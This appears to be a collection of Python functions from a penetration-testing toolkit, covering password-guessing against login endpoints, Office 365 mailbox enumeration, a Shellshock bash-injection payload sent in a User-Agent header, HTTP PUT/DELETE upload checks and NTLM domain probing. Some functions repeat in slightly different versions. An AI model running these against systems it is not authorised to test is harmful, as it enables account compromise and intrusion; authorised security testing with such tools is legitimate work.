def webdav_check(url):
    try:
        if web_request(url, 'PROPFIND').status_code == 207:
            return True
    except Exception:
        return False
    return False
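# Usage sketch (target URL is hypothetical): webdav_check() returns True only
# when the server answers a PROPFIND with 207 Multi-Status, i.e. WebDAV is enabled.
if webdav_check('http://10.0.0.5/'):
    print('WebDAV enabled')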
def worker(context):
    code = 0
    size = 0  # Initialized so failed requests don't raise NameError below
    try:
        a = auth_handler(context.user, context.password, auth_type=context.auth_type)
        r = web_request(context.target, method=context.method, timeout=context.timeout,
                        proxies=context.proxy, auth=a)
        code = r.status_code
        size = len(r.text)
    except Exception:
        pass

    if code not in [0, 401]:
        cliLogger.success("{:<35} {:<30} {:<24} (Code: {} | Size: {})".format(
            context.user, context.password, highlight('Success', fg='green'), code, size))
    elif context.verbose:
        cliLogger.fail("{:<35} {:<30} {:<24} (Code: {} | Size: {})".format(
            context.user, context.password, highlight('Failed', fg='red'), code, size))

    fileLogger.info("{}\t{}\t{}\t{}\t{}".format(get_timestamp(), context.target, code,
                                                context.user, context.password))
    sleep(context.jitter)
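# worker() expects a context object exposing the attributes referenced above.
# A minimal sketch using types.SimpleNamespace; every field value here is a
# hypothetical placeholder, not a real target or credential.
from types import SimpleNamespace

ctx = SimpleNamespace(target='https://host.example/login', method='GET',
                      auth_type='basic', user='admin', password='admin',
                      timeout=5, proxy=[], verbose=True, jitter=1)
worker(ctx)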
def cors_check(url, test_addr='example123abc.com', timeout=5, proxies=[], debug=False):
    data = {}
    header = {
        'User-Agent': choice(USERAGENTS),
        'Referer': url,
        'Origin': test_addr
    }
    try:
        # Pass the headers by keyword; the second positional arg of web_request is the method
        resp = web_request(url, headers=header, timeout=timeout, proxies=proxies, debug=debug)
        cors = extract_header('Access-Control-Allow-Origin', resp)
        if cors in [test_addr, '*']:
            data['Access-Control-Allow-Origin'] = cors
            for key, val in resp.headers.items():
                if key.startswith('Access-Control-Allow') and key != 'Access-Control-Allow-Origin':
                    data[key] = val.strip()
    except Exception:
        return False
    return data
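# Usage sketch (URL is hypothetical): a non-empty dict means the server reflected
# our arbitrary Origin back in Access-Control-Allow-Origin, indicating a
# permissive CORS policy worth investigating.
acao = cors_check('https://api.target.example/data')
if acao:
    for header_name, value in acao.items():
        print('{}: {}'.format(header_name, value))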
def crawl(self, src_url):
    src_url = self.linkModifier(src_url)
    next_depth = (self.__cur_depth + 1)
    resp = web_request(src_url, timeout=self.conn_timeout, proxies=self.proxies)
    if resp:
        self.pageParser(resp, next_depth)
def crawl(self, src_url):
    '''Execute web request and send to parser'''
    src_url = self.linkModifier(src_url)
    next_depth = (self.__cur_depth + 1)
    resp = web_request(src_url, timeout=self.conn_timeout, headers=self.headers, proxies=self.proxies)
    if get_statuscode(resp) != 0:
        self.pageParser(resp, next_depth)
def o365_validateUser(user, timeout, headers={}, proxy=[], verbose=False):
    url = 'https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/{user}?Protocol=Autodiscoverv1'
    headers['Accept'] = 'application/json'
    r = web_request(url.format(user=user), redirects=False, timeout=timeout, headers=headers, proxies=proxy)
    if get_statuscode(r) == 200:
        logger.success([user])
        ledger.info(user)
    elif verbose:
        logger.fail([user])
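# Usage sketch (address is hypothetical): the autodiscover JSON endpoint tends
# to answer 200 for mailboxes that exist and redirect otherwise, which is why
# redirects=False is set above -- the status code acts as the validity oracle.
o365_validateUser('jsmith@contoso.com', timeout=5, verbose=True)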
def putFile(url, timeout=4, data='TASER', data_ext=".txt", headers={},
            content_type="text/plain", proxies=[], debug=False):
    upload_file = gen_random_string(5) + data_ext
    target_url = rm_slash(url) + "/" + upload_file
    h = {
        'Host': extract_subdomain(url),
        'Content-Type': content_type,
        'Content-Length': str(len(data)),
        'Connection': 'close'
    }
    for k, v in headers.items():
        h[k] = v

    # Upload via HTTP PUT and check status code
    r1 = web_request(target_url, method='PUT', headers=h, data=data,
                     timeout=timeout, proxies=proxies, debug=debug)
    if r1 and r1.status_code in [200, 204, 202]:
        # Verify the file is actually retrievable before reporting success
        r2 = web_request(target_url, method='GET', timeout=timeout, proxies=proxies, debug=debug)
        if r2 and r2.status_code == 200 and data in r2.text:
            return upload_file
    return False
def tryHTTP(target, port, timeout, ssl=False, verbose=False, proxies=[]):
    schema = "https://" if ssl else "http://"
    t = schema + target + ":" + str(port)
    resp = web_request(t, timeout=timeout, debug=verbose, proxies=proxies)
    code = get_statuscode(resp)
    if code != 0:
        title = get_pagetitle(resp)
        server = extract_header('Server', resp)
        cliLogger.write("{:40} code: {:<3} | Size: {:<6}\tServer:{:<15}\tTitle:{}".format(
            t, code, len(resp.text), server, title))
        fileLogger.info("{:40} code: {:<3} | Size: {:<6}\tServer:{:<15}\tTitle:{}".format(
            t, code, len(resp.text), server, title))
        return True
    return False
def shellshock(url, target="User-Agent", timeout=5, proxies=[], debug=False):
    header = {target: "() { :; }; echo; echo; /bin/bash -c 'a=$((74*80*1103)) && echo Test-$a'"}
    resp = web_request(url, headers=header, timeout=timeout, proxies=proxies, debug=debug)
    if resp and "Test-6529760" in resp.text:
        return True
    return False
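# Why that marker string: instead of matching a static token that might appear
# in a normal page, the payload makes the target compute the product itself and
# echo a unique canary. The value is only present when a vulnerable bash
# actually evaluated the injected header.
assert 74 * 80 * 1103 == 6529760  # matches the "Test-6529760" canary above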
def prompt_NTLM(url, timeout, proxies=[]):
    challenge = {}
    h = {'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}
    request = web_request(url, timeout=timeout, headers=h, proxies=proxies)
    if not request or request.status_code not in [401, 302]:
        return challenge

    auth_header = request.headers.get('WWW-Authenticate')
    if not auth_header:
        return challenge

    challenge_message = base64.b64decode(auth_header.split(' ')[1].replace(',', ''))
    challenge = parse_challenge(challenge_message)
    return challenge
def deleteFile(url, filename, timeout=4, proxies=[], headers={}, debug=False):
    target_url = rm_slash(url) + "/" + filename
    h = {'Host': extract_subdomain(url), 'Connection': 'close'}
    for k, v in headers.items():
        h[k] = v

    r = web_request(target_url, method='DELETE', headers=h, timeout=timeout, proxies=proxies, debug=debug)
    if r and r.status_code in [200, 204, 202]:
        return True
    return False
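# Usage sketch (URL is hypothetical): pair putFile() and deleteFile() for a
# non-destructive HTTP PUT check -- upload a random file, then clean it up.
uploaded = putFile('http://10.0.0.5/uploads', data='TASER-put-test')
if uploaded:
    print('PUT enabled, uploaded: {}'.format(uploaded))
    deleteFile('http://10.0.0.5/uploads', uploaded)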
def prompt_NTLM(url, timeout, headers={}, proxies=[], debug=False):
    challenge = {}
    h = headers.copy()
    h['Authorization'] = 'NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='
    request = web_request(url, headers=h, timeout=timeout, proxies=proxies, debug=debug)
    if get_statuscode(request) not in [401, 302]:
        return challenge

    # Get auth header
    auth_header = request.headers.get('WWW-Authenticate')
    if not auth_header or 'NTLM' not in auth_header:
        return challenge

    # Get challenge message from header
    challenge_message = base64.b64decode(auth_header.split(' ')[1].replace(',', ''))

    # Parse challenge
    challenge = parse_challenge(challenge_message)
    return challenge
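# parse_challenge() is defined elsewhere in the library. A minimal sketch of
# what such a parser does, based on the NTLMSSP CHALLENGE (Type 2) message
# layout from MS-NLMP; the function name and returned dict keys here are
# illustrative, not taser's actual implementation.
import struct

def parse_challenge_sketch(data):
    # Fixed header: 8-byte "NTLMSSP\0" signature, then message type 2 (LE uint32)
    if data[:8] != b'NTLMSSP\x00' or struct.unpack('<I', data[8:12])[0] != 2:
        return {}
    # TargetInfo descriptor: length at offset 40 (uint16), buffer offset at 44 (uint32)
    info_len = struct.unpack('<H', data[40:42])[0]
    info_offset = struct.unpack('<I', data[44:48])[0]
    info = data[info_offset:info_offset + info_len]

    # TargetInfo is a list of AV_PAIRs: uint16 id, uint16 length, then the value
    av_names = {1: 'netbios_computer', 2: 'netbios_domain',
                3: 'dns_computer', 4: 'dns_domain', 5: 'dns_tree'}
    fields, pos = {}, 0
    while pos + 4 <= len(info):
        av_id, av_len = struct.unpack('<HH', info[pos:pos + 4])
        if av_id == 0:  # MsvAvEOL terminates the list
            break
        if av_id in av_names:
            fields[av_names[av_id]] = info[pos + 4:pos + 4 + av_len].decode('utf-16-le')
        pos += 4 + av_len
    return fields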
def search(self):
    timer = self.start_timer()
    self.total_links = 0  # Total links found by search engine
    self.page_links = 0   # Total links found by search engine w/ our domain in URL
    found_links = 0       # Local count to detect when no new links are found

    while timer.running:
        if self.total_links > 0 and found_links == self.page_links:
            timer.stop()
            return self.links
        found_links = self.page_links

        search_url = self.generateURL()
        resp = web_request(search_url, timeout=self.conn_timeout, headers=self.headers, proxies=self.proxies)
        if get_statuscode(resp) != 0:
            self.user_output(resp)
            self.pageParser(resp)

    timer.stop()
    return self.links
def search(self, search_engine, search_query):
    search_timeout = TaserTimeout(self.timeout)
    search_timeout.start()
    self.total_links = 0  # Total links found by search engine
    self.page_links = 0   # Total links found by search engine w/ our domain in URL
    found_links = 0       # Local count to detect when no new links are found

    while search_timeout.running:
        if self.total_links > 0 and found_links == self.page_links:
            search_timeout.stop()
            return self.links
        found_links = self.page_links

        search_url = self.linkModifier(search_engine, search_query)
        resp = web_request(search_url, timeout=self.conn_timeout, proxies=self.proxies)
        if resp:
            self.pageParser(resp, search_engine, search_query)

    search_timeout.stop()
    return self.links
def minion(url):
    resp = web_request(url, proxies=args.proxy, debug=args.verbose)
    if get_statuscode(resp) != 0:
        output_handler(resp, args)
def shellshock_check(url, timeout=5, proxies=[]):
    header = {"User-Agent": "() { :; }; echo; echo; /bin/bash -c 'a=$((74*80*1103)) && echo Test-$a'"}
    resp = web_request(url, headers=header, timeout=timeout, proxies=proxies)
    if resp and "Test-6529760" in resp.text:
        return True
    return False
def minion(url):
    resp = web_request(url, proxies=args.proxy, debug=args.verbose)
    if resp:
        output_handler(resp, args)
def minion(url, args):
    resp = web_request(url)
    if resp:
        output_handler(resp, args)
# TESTING ONLY
import sys
sys.path.append('..')
from time import sleep
from taser.proto.http import web_request

# Site to simply reflect the requesting IP address
target = 'http://ident.me'

# Proxy list
proxies = [
    'socks4://proxy.com:52616',
    'socks5://proxy.com:9000',
]

for x in range(0, 3):
    print('\nSending Request')
    r = web_request(target, proxies=proxies, headers={'X-Forwarded-For': '127.0.0.1'},
                    max_retries=1, timeout=3, debug=True)
    if r:
        print(r.text)
    else:
        print('Error: No response')
    sleep(1)